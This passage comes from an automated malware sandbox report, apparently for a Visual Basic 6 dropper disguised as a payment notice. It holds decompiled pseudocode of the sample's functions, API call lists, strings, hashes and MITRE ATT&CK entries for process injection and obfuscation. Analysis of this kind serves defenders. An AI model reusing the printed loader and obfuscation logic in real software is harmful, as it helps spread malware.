0x0041feef
0x0041fef9
0x0041ff01
0x0041ff05
0x0041ff06
0x0041ff08
0x0041ff10
0x0041ff19
0x0041ff1f
0x0041ff26
0x0041ff33
0x0041ff3b
0x0041ff3f
0x0041ff40
0x0041ff48
0x0041ff49
0x0041ff53
0x0041ff5b
0x0041ff5f
0x0041ff60
0x0041ff62
0x0041ff71
0x0041ff8e
0x0041ff73
0x0041ff73
0x0041ff78
0x0041ff7d
0x0041ff82
0x0041ff82
0x0041ffa0
0x0041ffaf
0x0041ffb2
0x0041ffb4
0x0041ffc1
0x0041ffe0
0x0041ffc3
0x0041ffc3
0x0041ffc5
0x0041ffca
0x0041ffcd
0x0041ffd3
0x0041ffd8
0x0041ffd8
0x0041ffea
0x00420002
0x00420005
0x00420007
0x00420014
0x00420036
0x00420016
0x00420016
0x00420018
0x0042001d
0x00420023
0x00420029
0x0042002e
0x0042002e
0x0042003d
0x00420040
0x00420046
0x00420053
0x0042005b
0x0042005b
0x00420068
0x0042006d
0x0042006e
0x004200b1
0x004200b9
0x004200be

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041FE08
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 0041FE33
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FE6C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000070), ref: 0041FEA4
#714.MSVBVM60(?,00000004,00000000), ref: 0041FECF
__vbaVarTstGt.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FEEA
__vbaFreeObj.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FEF9
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,00008003,?,?,00000004,00000000), ref: 0041FF08
__vbaVarDup.MSVBVM60 ref: 0041FF33
#518.MSVBVM60(?,?), ref: 0041FF40
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FF49
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FF53
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FF62
__vbaNew2.MSVBVM60(00403C70,004223FC,?,?,?,?,?,00401356), ref: 0041FF7D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 0041FFD3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,00000060), ref: 00420029
__vbaStrMove.MSVBVM60(00000000,?,00403C80,00000060), ref: 00420053
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,00000060), ref: 0042005B
__vbaStrCopy.MSVBVM60(?,?,00401356), ref: 00420068
__vbaFreeStr.MSVBVM60(004200BF,?,?,00401356), ref: 004200B1
__vbaFreeStr.MSVBVM60(004200BF,?,?,00401356), ref: 004200B9

Strings

Frigrelsesmidlerne5, xrefs: 0041FF1F
SVIRREFLUERS, xrefs: 00420060

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$CheckHresultMove$ListNew2$#518#714ChkstkCopy
String ID: Frigrelsesmidlerne5$SVIRREFLUERS
API String ID: 33727100-1709780716
Opcode ID: e3efaf9076d220c2e9ae3e4dad12770a47f50d6318d482541bc625af4e5fe5f2
Instruction ID: 0b183b5a8a01068596f8a86bc02a4bc04496b09846bd5a03aa7242892fb34695
Opcode Fuzzy Hash: e3efaf9076d220c2e9ae3e4dad12770a47f50d6318d482541bc625af4e5fe5f2
Instruction Fuzzy Hash: 3071D671A00228AFDB10EFA4DC85FDDBBB8BF04304F5040AAE545B71A1DB785A89DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004209D8, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004209D8(void* __ebx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				char* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v116;
				char _v124;
				short _v128;
				short _t49;
				char* _t52;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0x18;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t71;
				_push(0x70);
				L00401350();
				_v28 = _t71;
				_v24 = 0x4012d8;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				L004014E2();
				_v8 = 2;
				_v68 = 0x93c9f3d0;
				_v64 = 0x5b05;
				_v76 = 6;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v76);
				L00401422();
				L00401560();
				L0040157E();
				_v8 = 3;
				_push( &_v76);
				L00401476();
				_push( &_v76);
				_push( &_v92);
				L0040141C();
				_v116 = 0x6747;
				_v124 = 0x8002;
				_push( &_v92);
				_t49 =  &_v124;
				_push(_t49);
				L0040158A();
				_v128 = _t49;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L0040153C();
				_t52 = _v128;
				if(_t52 != 0) {
					_v8 = 4;
					_push(0xffffffff);
					L004014E8();
					_v8 = 5;
					_push(L"trinovantes");
					L00401416();
					_v48 = _t52;
					_v8 = 6;
					_push(0xf6);
					_push( &_v76);
					L00401410();
					_t52 =  &_v76;
					_push(_t52);
					L004014DC();
					L00401560();
					L0040157E();
				}
				_v8 = 8;
				L004013E6();
				_v60 = _t52;
				_v8 = 9;
				_v40 = 0x5d91;
				_push(0x420b60);
				L00401554();
				L00401554();
				L00401554();
				return _t52;
			}

0x004209db
0x004209de
0x004209e9
0x004209ea
0x004209f1
0x004209f4
0x004209fc
0x004209ff
0x00420a06
0x00420a0d
0x00420a14
0x00420a21
0x00420a26
0x00420a2d
0x00420a34
0x00420a3b
0x00420a42
0x00420a44
0x00420a46
0x00420a48
0x00420a4d
0x00420a4e
0x00420a58
0x00420a60
0x00420a65
0x00420a6f
0x00420a70
0x00420a78
0x00420a7c
0x00420a7d
0x00420a82
0x00420a89
0x00420a93
0x00420a94
0x00420a97
0x00420a98
0x00420a9d
0x00420aa4
0x00420aa8
0x00420aa9
0x00420aab
0x00420ab3
0x00420ab9
0x00420abb
0x00420ac2
0x00420ac4
0x00420ac9
0x00420ad0
0x00420ad5
0x00420ada
0x00420add
0x00420ae4
0x00420aec
0x00420aed
0x00420af2
0x00420af5
0x00420af6
0x00420b00
0x00420b08
0x00420b08
0x00420b0d
0x00420b14
0x00420b19
0x00420b1c
0x00420b23
0x00420b29
0x00420b4a
0x00420b52
0x00420b5a
0x00420b5f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 004209F4
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420A21
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A4E
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A58
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A60
#610.MSVBVM60(00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A70
#553.MSVBVM60(?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A7D
__vbaVarTstEq.MSVBVM60(00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A98
__vbaFreeVarList.MSVBVM60(00000002,00000006,?,00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE), ref: 00420AAB
__vbaOnError.MSVBVM60(000000FF,?,?,00401356), ref: 00420AC4
#578.MSVBVM60(trinovantes,000000FF,?,?,00401356), ref: 00420AD5
#526.MSVBVM60(?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420AED
__vbaStrVarMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420AF6
__vbaStrMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420B00
__vbaFreeVar.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420B08
#615.MSVBVM60(?,?,00401356), ref: 00420B14
__vbaFreeStr.MSVBVM60(00420B60), ref: 00420B4A
__vbaFreeStr.MSVBVM60(00420B60), ref: 00420B52
__vbaFreeStr.MSVBVM60(00420B60), ref: 00420B5A

Strings

Gg, xrefs: 00420A82
trinovantes, xrefs: 00420AD0

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$Free$Move$#526#553#578#610#615#703ChkstkCopyErrorList
String ID: Gg$trinovantes
API String ID: 2274906189-1238276640
Opcode ID: 62198f7fdb713f284cedb44c01d04233f55bca502a87358a4ed923faf77f2fe6
Instruction ID: f4eeb5ac980d1d7c25bd2abbea76b52a132f80569c7ca933953b0d62cd654026
Opcode Fuzzy Hash: 62198f7fdb713f284cedb44c01d04233f55bca502a87358a4ed923faf77f2fe6
Instruction Fuzzy Hash: 4D410171C0020CAADB10EFE5C946BDEBBB8AF44718F60412AF111771E1EB785649CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420B7D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00420B7D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v36;
				char _v48;
				short _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				void* _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				short _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				char* _t121;
				signed int _t125;
				char* _t131;
				signed int _t135;
				short _t139;
				char* _t146;
				signed int _t152;
				signed int _t157;
				char* _t159;
				void* _t180;
				void* _t182;
				intOrPtr _t183;

				_t183 = _t182 - 0xc;
				 *[fs:0x0] = _t183;
				L00401350();
				_v16 = _t183;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t180);
				_push(0x11);
				_push(0x404088);
				_push( &_v48);
				L004014B8();
				if( *0x422010 != 0) {
					_v172 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v172 = 0x422010;
				}
				_t121 =  &_v68;
				L00401566();
				_v132 = _t121;
				_t125 =  *((intOrPtr*)( *_v132 + 0x1c8))(_v132,  &_v124, _t121,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
				asm("fclex");
				_v136 = _t125;
				if(_v136 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403c90);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v176 = _t125;
				}
				_push(_v124);
				_push( &_v88);
				L0040140A();
				if( *0x422010 != 0) {
					_v180 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v180 = 0x422010;
				}
				_t131 =  &_v72;
				L00401566();
				_v140 = _t131;
				_t135 =  *((intOrPtr*)( *_v140 + 0x1e0))(_v140,  &_v64, _t131,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x300))( *_v180));
				asm("fclex");
				_v144 = _t135;
				if(_v144 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c90);
					_push(_v140);
					_push(_v144);
					L00401572();
					_v184 = _t135;
				}
				_v168 = _v64;
				_v64 = _v64 & 0x00000000;
				_v96 = _v168;
				_v104 = 0x8008;
				_push( &_v88);
				_t139 =  &_v104;
				_push(_t139);
				L00401458();
				_v148 = _t139;
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L00401512();
				_push( &_v104);
				_push( &_v88);
				_push(2);
				L0040153C();
				if(_v148 != 0) {
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c70);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v132 =  *_v188;
					_t152 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v68);
					asm("fclex");
					_v136 = _t152;
					if(_v136 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c60);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v192 = _t152;
					}
					_v140 = _v68;
					_t157 =  *((intOrPtr*)( *_v140 + 0xc8))(_v140,  &_v124);
					asm("fclex");
					_v144 = _t157;
					if(_v144 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c80);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v196 = _t157;
					}
					_v56 = _v124;
					L0040156C();
					_t159 =  &_v48;
					_push(_t159);
					_push(1);
					L00401404();
					_v156 = _t159;
					_v152 = 1;
					_v60 = _v60 & 0x00000000;
					while(_v60 <= _v156) {
						asm("cdq");
						 *((char*)(_v36 + _v60)) = (_v60 + 0xe9) % 0xff;
						_v60 = _v60 + _v152;
					}
				}
				_push(0x420f0e);
				_v128 =  &_v48;
				_t146 =  &_v128;
				_push(_t146);
				_push(0);
				L004014D6();
				return _t146;
			}

0x00420b80
0x00420b8f
0x00420b9b
0x00420ba3
0x00420ba6
0x00420bad
0x00420bbc
0x00420bbf
0x00420bc1
0x00420bc9
0x00420bca
0x00420bd6
0x00420bf3
0x00420bd8
0x00420bd8
0x00420bdd
0x00420be2
0x00420be7
0x00420be7
0x00420c17
0x00420c1b
0x00420c20
0x00420c2f
0x00420c35
0x00420c37
0x00420c44
0x00420c66
0x00420c46
0x00420c46
0x00420c4b
0x00420c50
0x00420c53
0x00420c59
0x00420c5e
0x00420c5e
0x00420c71
0x00420c75
0x00420c76
0x00420c82
0x00420c9f
0x00420c84
0x00420c84
0x00420c89
0x00420c8e
0x00420c93
0x00420c93
0x00420cc3
0x00420cc7
0x00420ccc
0x00420ce4
0x00420cea
0x00420cec
0x00420cf9
0x00420d1e
0x00420cfb
0x00420cfb
0x00420d00
0x00420d05
0x00420d0b
0x00420d11
0x00420d16
0x00420d16
0x00420d28
0x00420d2e
0x00420d38
0x00420d3b
0x00420d45
0x00420d46
0x00420d49
0x00420d4a
0x00420d4f
0x00420d59
0x00420d5d
0x00420d5e
0x00420d60
0x00420d6b
0x00420d6f
0x00420d70
0x00420d72
0x00420d83
0x00420d90
0x00420dad
0x00420d92
0x00420d92
0x00420d97
0x00420d9c
0x00420da1
0x00420da1
0x00420dbf
0x00420dce
0x00420dd1
0x00420dd3
0x00420de0
0x00420dff
0x00420de2
0x00420de2
0x00420de4
0x00420de9
0x00420dec
0x00420df2
0x00420df7
0x00420df7
0x00420e09
0x00420e21
0x00420e27
0x00420e29
0x00420e36
0x00420e5b
0x00420e38
0x00420e38
0x00420e3d
0x00420e42
0x00420e48
0x00420e4e
0x00420e53
0x00420e53
0x00420e66
0x00420e6d
0x00420e72
0x00420e75
0x00420e76
0x00420e78
0x00420e7d
0x00420e83
0x00420e8d
0x00420e9f
0x00420eb2
0x00420ec0
0x00420e9c
0x00420e9c
0x00420e9f
0x00420ec4
0x00420eff
0x00420f02
0x00420f05
0x00420f06
0x00420f08
0x00420f0d

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420B9B
__vbaAryConstruct2.MSVBVM60(?,00404088,00000011,?,?,?,?,00401356), ref: 00420BCA
__vbaNew2.MSVBVM60(00403270,00422010,?,00404088,00000011,?,?,?,?,00401356), ref: 00420BE2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420C1B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001C8), ref: 00420C59
#698.MSVBVM60(?,?), ref: 00420C76
__vbaNew2.MSVBVM60(00403270,00422010,?,?), ref: 00420C8E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420CC7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,000001E0), ref: 00420D11
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00420D4A
__vbaFreeObjList.MSVBVM60(00000002,?,?,00008008,?), ref: 00420D60
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401356), ref: 00420D72
__vbaNew2.MSVBVM60(00403C70,004223FC,?,?,?,?,?,00401356), ref: 00420D9C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000014), ref: 00420DF2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C80,000000C8), ref: 00420E4E
__vbaFreeObj.MSVBVM60(00000000,?,00403C80,000000C8), ref: 00420E6D
__vbaUbound.MSVBVM60(00000001,?), ref: 00420E78
__vbaAryDestruct.MSVBVM60(00000000,?,00420F0E,?,?,?,?,?,00401356), ref: 00420F08

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$CheckHresult$FreeNew2$List$#698ChkstkConstruct2DestructUbound
String ID:
API String ID: 2830902964-0
Opcode ID: 8df1a83ed33e4ef2625b0178c24074b8593b23ab5407873875fe97c90aecff85
Instruction ID: 1fcdab346f333d58c61745b2a620d3bb23f0a341a3522b1ecb0b25eab8a8eef1
Opcode Fuzzy Hash: 8df1a83ed33e4ef2625b0178c24074b8593b23ab5407873875fe97c90aecff85
Instruction Fuzzy Hash: 12A11A71A00228EFDB10DF94DD45F9DBBB5BF04304F5080AAE549B72A1DB785A84DF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5DC, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E0041F5DC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				char _v52;
				char* _t105;
				void* _t167;
				void* _t169;
				void* _t171;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t195;
				void* _t197;
				void* _t202;
				void* _t204;
				long long* _t205;

				_t205 = _t204 - 0xc;
				 *[fs:0x0] = _t205;
				L00401350();
				_v16 = _t205;
				_v12 = 0x401280;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401356, _t202);
				 *_t205 =  *0x401278;
				L004014A0();
				L004014A6();
				asm("fcomp qword [0x401270]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags >= 0) {
					_push(0x91);
					_push(0x36);
					_push(0x50);
					_push( &_v52);
					L0040149A();
					_push( &_v52);
					L004014DC();
					L00401560();
					L0040157E();
					_push(0);
					_push(0x10);
					_push(1);
					_push(0x11);
					_push( &_v32);
					_push(1);
					_push(0x80);
					L00401494();
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + 0 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x85;
					_t167 = 1;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t167 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa;
					_t169 = 2;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t169 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x10;
					_t171 = 3;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t171 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x30;
					_t173 = 4;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t173 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x69;
					_t175 = 5;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t175 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x5e;
					_t177 = 6;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t177 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x4f;
					_t179 = 7;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t179 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xfb;
					_t181 = 8;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t181 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa2;
					_t183 = 9;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t183 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x1d;
					_t185 = 0xa;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t185 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x14;
					_t187 = 0xb;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t187 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xec;
					_t189 = 0xc;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t189 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x58;
					_t191 = 0xd;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t191 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x9f;
					_t193 = 0xe;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t193 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xe2;
					_t195 = 0xf;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t195 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xbd;
					_t197 = 0x10;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t197 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x6e;
				}
				_v36 = 0x7d58f0;
				asm("wait");
				_push(0x41f7f6);
				L00401554();
				_t105 =  &_v32;
				_push(_t105);
				_push(0);
				L004014D6();
				return _t105;
			}

0x0041f5df
0x0041f5ee
0x0041f5f8
0x0041f600
0x0041f603
0x0041f60a
0x0041f619
0x0041f624
0x0041f627
0x0041f62c
0x0041f631
0x0041f637
0x0041f639
0x0041f63a
0x0041f640
0x0041f645
0x0041f647
0x0041f64c
0x0041f64d
0x0041f655
0x0041f656
0x0041f660
0x0041f668
0x0041f66d
0x0041f66f
0x0041f671
0x0041f673
0x0041f678
0x0041f679
0x0041f67b
0x0041f680
0x0041f696
0x0041f69f
0x0041f6a9
0x0041f6b2
0x0041f6bc
0x0041f6c5
0x0041f6cf
0x0041f6d8
0x0041f6e2
0x0041f6eb
0x0041f6f5
0x0041f6fe
0x0041f708
0x0041f711
0x0041f71b
0x0041f724
0x0041f72e
0x0041f737
0x0041f741
0x0041f74a
0x0041f754
0x0041f75d
0x0041f767
0x0041f770
0x0041f77a
0x0041f783
0x0041f78d
0x0041f796
0x0041f7a0
0x0041f7a9
0x0041f7b3
0x0041f7bc
0x0041f7c6
0x0041f7c6
0x0041f7ca
0x0041f7d1
0x0041f7d2
0x0041f7e5
0x0041f7ea
0x0041f7ed
0x0041f7ee
0x0041f7f0
0x0041f7f5

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F5F8
#582.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F627
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F62C
#539.MSVBVM60(00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F64D
__vbaStrVarMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F656
__vbaStrMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F660
__vbaFreeVar.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F668
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000010,00000000,00000036,00000036,00000050,00000036,00000091), ref: 0041F680
__vbaFreeStr.MSVBVM60(0041F7F6), ref: 0041F7E5
__vbaAryDestruct.MSVBVM60(00000000,?,0041F7F6), ref: 0041F7F0

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: __vba$FreeMove$#539#582ChkstkDestructRedim
String ID:
API String ID: 1927214042-0
Opcode ID: 5a0ee8222c203b6c51c72bf99dbcaae587b8743ab61166e1a8bb73ead2339c9f
Instruction ID: cd7398327c680d516bd1e88d124315e7ea318199c39c1a96f6f803b2497de462
Opcode Fuzzy Hash: 5a0ee8222c203b6c51c72bf99dbcaae587b8743ab61166e1a8bb73ead2339c9f
Instruction Fuzzy Hash: 8C812175A101459FDB19DFA8D985F6ABBB0EB09710F06818AFD509F3E2C778E442CB21

Uniqueness

Uniqueness Score: -1.00%

Function 004212FB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004212FB() {
				signed int _v8;
				signed int _t8;
				char _t10;
				signed int _t13;
				intOrPtr _t15;
				intOrPtr _t17;

				_push(4);
				L00401350();
				_t8 = 1;
				_t13 = 1;
				_t15 =  *0x422034; // 0x655de0
				_t17 =  *0x422034; // 0x655de0
				_t10 =  *((intOrPtr*)(_t17 + _t8 * 0xffffffff));
				 *((char*)(_t15 + _t13 * 0xffffffff)) = _t10;
				_push( *0x422034);
				L004013F8();
				 *0x422040 = _t10;
				_v8 = _v8 | 0x0000ffff;
				 *0x422044 = _v8;
				return _v8;
			}

0x004212fe
0x00421301
0x00421309
0x0042130f
0x00421313
0x00421319
0x0042131f
0x00421322
0x00421325
0x0042132b
0x00421330
0x00421335
0x0042133e
0x0042134a

APIs

__vbaChkstk.MSVBVM60(?,004210CE,?,?,?,?,00401356), ref: 00421301
#644.MSVBVM60(?,?,004210CE,?,?,?,?,00401356), ref: 0042132B

Strings

]e, xrefs: 00421313, 00421319

Memory Dump Source

Source File: 00000000.00000002.1192664197.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1192652913.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192685912.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192700655.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirming - Aviso de pago.jbxd

Similarity

API ID: #644Chkstk__vba
String ID: ]e
API String ID: 3537395942-3606848082
Opcode ID: 74649e57115f7ca9a863922dfc4142227efb31173977d86ddf66d4814d590b0c
Instruction ID: 55f39d54ae3e600ff5c48cfd089e1e8e11abb8126e3a43a06374aa452dded26c
Opcode Fuzzy Hash: 74649e57115f7ca9a863922dfc4142227efb31173977d86ddf66d4814d590b0c
Instruction Fuzzy Hash: 3BF0E539202741B9C7387B64AF1269ABB78EF0A750F50006AFB01AF2B1D3B05942E75C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

